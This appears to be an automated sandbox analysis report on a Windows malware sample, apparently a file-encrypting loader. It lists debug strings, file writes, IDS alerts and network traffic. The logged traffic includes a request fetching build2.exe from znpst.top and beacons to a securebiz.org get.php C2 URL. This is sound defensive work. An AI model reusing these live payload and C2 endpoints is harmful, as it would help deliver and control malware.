        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\bwe\ source: C0XWmZAnYk.exe, 00000006.00000003.2672302917.000000000319D000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2672161713.0000000003194000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674313823.00000000031A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ion D source: C0XWmZAnYk.exe, 00000006.00000003.2671662038.0000000003386000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: C0XWmZAnYk.exe, C0XWmZAnYk.exe, 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: C0XWmZAnYk.exe, 00000006.00000003.2591021767.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590747868.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601778052.0000000003107000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601623756.0000000003102000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600894064.00000000030FF000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2591557050.00000000030FF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\en-IN\od.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2674124024.00000000036FA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\5g source: C0XWmZAnYk.exe, 00000006.00000003.2665419996.00000000037F9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: C0XWmZAnYk.exe, 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error\8yKAc source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ication Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2642794502.0000000003640000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641554620.0000000003639000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.rigd source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\0 source: C0XWmZAnYk.exe, 00000006.00000003.2665419996.00000000037E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l source: C0XWmZAnYk.exe, 00000006.00000003.2589870665.0000000003132000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2591201066.0000000003132000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\2txyewy\ source: C0XWmZAnYk.exe, 00000006.00000003.2672302917.000000000319D000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2672161713.0000000003194000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674313823.00000000031A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2643245357.0000000003712000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\DVR source: C0XWmZAnYk.exe, 00000006.00000003.2622483733.0000000003447000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622771619.000000000347C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393360628.0000000003303000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\Cv source: C0XWmZAnYk.exe, 00000006.00000003.2674038254.0000000003681000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659154653.0000000003670000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.0000000003651000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.0000000003639000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654119617.0000000003681000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660593047.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2655075144.0000000003699000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659606445.00000000036B9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\| source: C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.rigd source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2623228600.0000000003460000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622483733.0000000003447000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600307497.000000000343F000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622861915.0000000003454000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600375568.0000000003454000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\\LD source: C0XWmZAnYk.exe, 00000006.00000003.2355657291.0000000003100000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: C0XWmZAnYk.exe, 00000006.00000003.2672094700.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\me\0 source: C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2677146833.0000000003755000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674440294.0000000003755000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\ source: C0XWmZAnYk.exe, 00000006.00000003.2665007852.00000000036A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\!u source: C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ls\ source: C0XWmZAnYk.exe, 00000006.00000003.2664952118.00000000036E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\'GfK source: C0XWmZAnYk.exe, 00000006.00000003.2516054824.0000000003109000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569291711.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569964189.0000000003109000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570520442.000000000310A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\C^ source: C0XWmZAnYk.exe, 00000006.00000003.2665181944.0000000003116000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ies\inJO source: C0XWmZAnYk.exe, 00000006.00000003.2570024830.000000000330D000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569761077.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600081582.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570316062.000000000330E000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601014852.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2589166034.0000000003312000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601595127.0000000003313000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\40\QRfHa source: C0XWmZAnYk.exe, 00000006.00000003.2664952118.00000000036E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\~M source: C0XWmZAnYk.exe, 00000006.00000003.2642157736.0000000003313000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641465788.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622184907.0000000003303000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.rigdd source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2643245357.0000000003712000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbtDir\LogFile_October_4_2023__16_5_0.txt{ source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2622120522.0000000003621000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2623261146.0000000003639000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2623323200.0000000003649000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb? source: C0XWmZAnYk.exe, 00000006.00000003.2517804596.00000000030F7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*Z source: C0XWmZAnYk.exe, 00000006.00000003.2677146833.0000000003755000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674440294.0000000003755000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\bbwe\e\L source: C0XWmZAnYk.exe, 00000006.00000003.2672094700.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2601560018.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590007588.0000000003160000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2622120522.0000000003621000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2623261146.0000000003639000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2623323200.0000000003649000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: C0XWmZAnYk.exe, 00000006.00000003.2622184907.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600081582.00000000032B1000.00000004.00000020.00020000.00000000.sdmp

        Spreading

        barindex
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.5:49706 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.5:49706 -> 92.246.89.93:80
        Source: Malware configuration extractorURLs: http://securebiz.org/fhsgtsspen6/get.php
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 92.246.89.93 92.246.89.93
        Source: Joe Sandbox ViewASN Name: LIVECOMM-ASRespublikanskayastr3k6RU LIVECOMM-ASRespublikanskayastr3k6RU
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49716 -> 188.114.96.3:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 188.114.96.3:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 188.114.96.3:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 188.114.96.3:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 188.114.96.3:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: znpst.top
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317193738.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317614991.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317750484.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
        Source: global trafficDNS traffic detected: DNS query: znpst.top
        Source: global trafficDNS traffic detected: DNS query: securebiz.org
        Source: C0XWmZAnYk.exe, 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/fhsgtsspen6/get.php
        Source: C0XWmZAnYk.exe, 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C54
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
